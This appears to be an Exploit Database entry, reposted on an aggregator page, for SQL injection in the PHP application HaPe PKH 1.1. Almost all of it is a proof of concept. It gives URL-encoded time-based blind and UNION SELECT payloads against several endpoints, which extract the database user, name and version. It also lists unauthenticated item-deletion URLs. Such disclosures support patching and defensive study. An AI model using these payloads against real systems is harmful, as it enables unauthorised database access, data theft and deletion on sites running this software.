HaPe PKH 1.1 – ‘id’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： Ihsan Sencan
  日期： 2018-10-12
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45588/

• # Exploit Title: HaPe PKH 1.1 - 'id' SQL Injection
  # Dork: N/A
  # Date: 2018-10-12
  # Exploit Author: Ihsan Sencan
  # Vendor Homepage: http://www.sitejo.id
  # Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
  # Version: 1.1
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: N/A
  
  # POC: 
  # # 1) Everyone
  # POST http://localhost/[PATH]/lap-anggota-kelompok-pdf.php HTTP/1.1
  
  nama_kelompok=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
   
  # 2) Everyone
  # POST http://localhost/hape-pkh/lap-peserta-perdesa-pdf.php
  
  desa=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
  
  # 3) Everyone
  # http://localhost/[PATH]/admin/media.php?module=desa&act=hapus&id=[SQL]
  
  %27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
  
  # 4) Users
  # http://localhost/[PATH]/admin/media.php?module=pengurus&act=print&id=[SQL]
  
  %2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
   
  # 5) Users
  # http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]
  
  &id=%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
   
  # 6) Users
  # http://localhost/[PATH]/admin/media.php?module=fasilitas&act=editfasilitas&id=[SQL]
  
  %2d%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%53%59%53%54%45%4d%5f%55%53%45%52%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
   
  # 7) Users
  # http://localhost/[PATH]/admin/media.php?module=kelompok&act=editkelompok&id=[SQL]
  
  %2d%31%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2d%2d%20%2d
   
  # 8) Everyone
  # Delete Item *
  
  http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=hapus&id=[ID]
  http://localhost/[PATH]/admin/modul/mod_update/aksi_update.php?module=update&act=hapus&id=[ID]